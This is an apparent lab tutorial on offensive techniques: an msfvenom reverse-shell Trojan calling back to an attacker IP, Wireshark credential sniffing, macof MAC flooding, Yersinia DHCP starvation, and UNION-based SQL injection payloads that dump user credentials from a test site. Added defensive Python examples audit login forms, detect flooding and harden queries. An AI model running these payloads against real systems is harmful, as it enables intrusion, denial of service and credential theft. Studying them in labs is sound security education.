Sniffing and SQL Injection

The document outlines various hacking techniques including creating a Trojan for reverse shell access using msfvenom, sniffing network packets with Wireshark, and executing MAC flooding and DHCP starvation attacks using macof and Yersinia. It also details SQL injection methods to exploit website vulnerabilities and extract user credentials. Each section provides step-by-step instructions for executing these attacks on a target system.

Uploaded by

vrockrasia
Sniffing and SQL Injection

1-Create a Trojan to get reverse shell access to the victim's machine


On the Kali machine, use msfvenom to create a malicious Windows executable file (.exe) for the reverse TCP connection to the Windows operating system.

Open a terminal and type sudo -i

In Kali, execute the following command to learn about msfvenom, which is part of Metasploit.
Determine which payload you want to use. To list the available payload options, type:

Host # msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.12 lport=443 -f exe > rahul.exe
Host # python -m SimpleHTTPServer 80

A malicious file, rahul.exe, is created which, upon execution on the victim's machine, will give a reverse shell to the attacker.

Launch the Metasploit console


Use exploit/multi/handler
We will use the Metasploit console to set the payload, LHOST & LPORT. Run the exploit

Now, we must download the malicious file on the Windows machine (victim).

Before downloading the file, turn off the Windows Defender settings as shown below
and press OK.

Turn off the Virus & Threat protection settings as well.

Open Internet Explorer. Enter Kali's IP in the URL bar along with the name of the file to download.

(In an ideal scenario, these malicious files are sent via email or other malware propagation methods.)

Sniffing Network Packets Using Wireshark

Download Wireshark from the website (https://www.wireshark.org/#download) and install it on the attacker machine.
Open Wireshark, select the connected network interface and start sniffing using the green icon.

It will start sniffing all the packets on the network.


If the victim opens any website that uses the HTTP protocol on the network and logs in with credentials, the attacker can easily sniff the traffic using Wireshark and capture the login details.

Filter on the HTTP protocol in Wireshark and look at the POST requests to see the username and password entered by the victim on a website.
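Because the capture above only works when a login is sent over plain HTTP, a site owner can audit pages for forms that would expose credentials this way. The following is an added example, not part of the original document; the host name shop.example, the page names and the sample HTML are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

class LoginFormAudit(HTMLParser):
    """Collects forms that contain a password field and how they are submitted."""
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.form = None      # form currently being parsed
        self.findings = []    # list of (action_url, [reasons])

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form = {"action": urljoin(self.page_url, a.get("action") or ""),
                         "method": (a.get("method") or "get").lower(),
                         "has_password": False}
        elif tag == "input" and self.form is not None:
            if (a.get("type") or "").lower() == "password":
                self.form["has_password"] = True

    def handle_endtag(self, tag):
        if tag != "form" or self.form is None:
            return
        form, self.form = self.form, None
        if not form["has_password"]:
            return
        reasons = []
        if urlsplit(form["action"]).scheme != "https":
            reasons.append("credentials submitted over cleartext HTTP")
        elif urlsplit(self.page_url).scheme != "https":
            reasons.append("form served over HTTP; action can be rewritten in transit")
        if form["method"] == "get":
            reasons.append("credentials placed in the URL (GET)")
        if reasons:
            self.findings.append((form["action"], reasons))

def audit(page_url, html):
    parser = LoginFormAudit(page_url)
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample page: one login form and one search form.
SAMPLE = """
<form action="auth.php" method="post">
  <input type="text" name="uname"><input type="password" name="pass">
</form>
<form action="search.php" method="get"><input type="text" name="q"></form>
"""
```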

MAC Flooding Using macof

Flood the CAM table of a target system (Windows machine)

1-Log in to the Kali Linux machine and open the terminal. Log in as the root user ( sudo -i )

2-Install the macof tool if it has not already been installed. Type 'apt-get install dsniff'

3-Type man macof on the terminal to look at the manual. Press q to quit the page

Start the MAC flooding attack using the following command:

macof -i eth0 -d 10.11.6.26

where:

-i = interface (eth0)

-d = destination (10.11.6.2 = switch port)

Flooding the switch with bogus MACs

You can also specify the number of packets to send by using the following command:

macof -i eth0 -n 10 -d 10.11.6.1

DHCP attack using Yersinia


Perform a DHCP starvation attack using Yersinia

Launch the Kali machine and open a terminal.

If Yersinia is not installed, install it with the following command
By default, Yersinia is installed on Kali for penetration testing purposes.

Execute the command "yersinia -G" to open Yersinia in GUI mode


Click "Edit Interface" to select the interface on which you want to launch the attack. Choose eth0.

On the menu bar, click Launch attack. A window pops up to choose the protocol for the attack.
Select DHCP and enable the option for sending DISCOVER packet (DHCP DDoS)

The router is flooded with DHCPDISCOVER packets. Observe the number of packets that are sent to starve the server.
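For the defender's side of the MAC flooding and DHCP starvation sections above, this added example (not part of the original document) flags switch ports where the number of distinct source MAC addresses seen in a short window exceeds a limit, the signature both attacks share. The log line format, port names, window and threshold are assumptions constructed for the example, not the output of any real switch.

```python
from collections import defaultdict, deque

def parse(lines, kind):
    """Yield (timestamp, port, mac) from constructed lines: '<epoch> <kind> <port> <mac>'."""
    for line in lines:
        ts, k, port, mac = line.split()
        if k == kind:
            yield float(ts), port, mac.lower()

def flag_floods(events, window=10.0, max_macs=8):
    """Return {port: peak distinct MACs seen within `window` seconds} for ports over max_macs."""
    recent = defaultdict(deque)   # port -> (ts, mac) pairs still inside the window
    peak = {}
    for ts, port, mac in sorted(events):
        q = recent[port]
        q.append((ts, mac))
        while q and ts - q[0][0] > window:
            q.popleft()           # drop observations older than the window
        distinct = len({m for _, m in q})
        if distinct > max_macs:
            peak[port] = max(peak.get(port, 0), distinct)
    return peak

def sample_lines():
    # Constructed data: Gi0/1 is a normal access port (two hosts, one client
    # retrying DHCPDISCOVER); Gi0/7 shows 40 random-looking MACs in under 2 s.
    lines = ["100.00 MAC_LEARN Gi0/1 00:11:22:33:44:55",
             "101.00 DHCPDISCOVER Gi0/1 00:11:22:33:44:55",
             "102.00 DHCPDISCOVER Gi0/1 00:11:22:33:44:55",
             "103.00 MAC_LEARN Gi0/1 00:11:22:33:44:66"]
    for i in range(40):
        mac = "02:00:00:00:00:%02x" % i
        lines.append("%.2f MAC_LEARN Gi0/7 %s" % (104 + i * 0.01, mac))
        lines.append("%.2f DHCPDISCOVER Gi0/7 %s" % (105 + i * 0.05, mac))
    return lines

if __name__ == "__main__":
    lines = sample_lines()
    print("MAC flooding suspects:   ", flag_floods(parse(lines, "MAC_LEARN")))
    print("DHCP starvation suspects:", flag_floods(parse(lines, "DHCPDISCOVER")))
```

The per-port limit in the example plays the same role as a maximum-addresses setting in switch port security or a rate limit on untrusted ports in DHCP snooping: one access port has no reason to present dozens of new hardware addresses within seconds.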
SQL Injection

Determine how attackers may obtain the database of a website and steal the credentials of users through a website vulnerability.

Open the website (http://testphp.vulnweb.com/).

Select artists→r4w8173

Add a special character after the URL ( ' ). If it shows an error, then the website is vulnerable to SQL Injection.

http://testphp.vulnweb.com/artists.php?artist=1'

Find how many columns are in public by entering the commands below.

http://testphp.vulnweb.com/artists.php?artist=1 order by 1 → No error
http://testphp.vulnweb.com/artists.php?artist=1 order by 2 → No error
http://testphp.vulnweb.com/artists.php?artist=1 order by 3 → No error
http://testphp.vulnweb.com/artists.php?artist=1 order by 4 → Error (N-1=4-1=3)

Find the vulnerable columns of the website using the command below:

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,3

2 and 3 are vulnerable columns. Let us select column 2.

Find the database name of the website using the command below:

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1, database(), 3

Select the users table to view the users' information.

Find the columns in a table using the command below. Convert the users table name to hex-encoded characters to bypass the firewall, using (https://codebeautify.org/string-hex-converter)

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1, group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273

We need the uname and pass to find the information.

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1, group_concat(uname,0x3a, pass) from users

Try to log in to the website with the username and password.
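The probes above work because the artist parameter is concatenated into the SQL text. The following added example (not part of the original document, and not the test site's code) runs the page's own probe strings against a vulnerable lookup and a hardened one; SQLite stands in for the site's database, and the table layout and function names are assumptions.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the site's three-column artists table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE artists (artist_id INTEGER PRIMARY KEY, aname TEXT, adesc TEXT)")
    db.execute("INSERT INTO artists VALUES (1, 'r4w8173', 'constructed sample row')")
    return db

def lookup_vulnerable(db, artist):
    # The request parameter is pasted into the SQL text, so it is parsed as SQL.
    return db.execute("SELECT * FROM artists WHERE artist_id = " + artist).fetchall()

def lookup_hardened(db, artist):
    # Accept only an ASCII integer, then bind it as a value, never as SQL text.
    if not (artist.isascii() and artist.isdigit()):
        raise ValueError("artist must be a non-negative integer")
    return db.execute("SELECT * FROM artists WHERE artist_id = ?", (int(artist),)).fetchall()

def outcome(fn, db, artist):
    # Classify what the caller observes for one input.
    try:
        rows = fn(db, artist)
    except sqlite3.Error:
        return "sql-error"     # a database error reaches the caller
    except ValueError:
        return "rejected"      # input refused before any SQL runs
    return "rows:%d" % len(rows)

# Probe strings taken from the walkthrough above.
PAGE_INPUTS = ["1", "1'", "1 order by 3", "1 order by 4", "-1 union select 1,2,3"]

def compare():
    db = make_db()
    return {v: (outcome(lookup_vulnerable, db, v), outcome(lookup_hardened, db, v))
            for v in PAGE_INPUTS}

if __name__ == "__main__":
    for value, (weak, strong) in compare().items():
        print("%-26r vulnerable=%-10s hardened=%s" % (value, weak, strong))
```

In the hardened lookup every probe except the legitimate value 1 is refused before a query is built, so neither the error-based test nor the UNION step has anything to act on.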
